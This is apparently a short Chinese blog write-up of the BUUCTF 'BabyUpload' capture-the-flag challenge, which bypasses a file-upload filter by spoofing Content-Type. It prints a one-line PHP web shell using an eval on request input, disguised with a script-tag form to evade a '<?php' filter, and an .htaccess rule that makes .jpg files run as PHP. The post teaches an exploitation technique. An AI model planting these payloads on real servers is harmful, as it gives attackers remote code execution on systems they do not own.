0
点赞
收藏
分享

微信扫一扫

buuctf-BabyUpload

写心之所想 2022-03-26 阅读 56
网络安全

上传php文件,过滤后缀

上传jpg文件

上传png文件,和文件类型有关(Content-Type)

 

 所以应该要上传jpg文件类型

上传一句话木马就会出现问题,筛查后发现是<?php

 改一下木马格式就可以了

<script language="php">eval($_REQUEST[value])</script>

 但是后缀无法修改成php类型,各种方式都试过了

想到.htaccess和.user.ini

和文件类型有关,就修改文件类型

<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>

 我之前存的几个代码好像都不能用

举报

相关推荐

0 条评论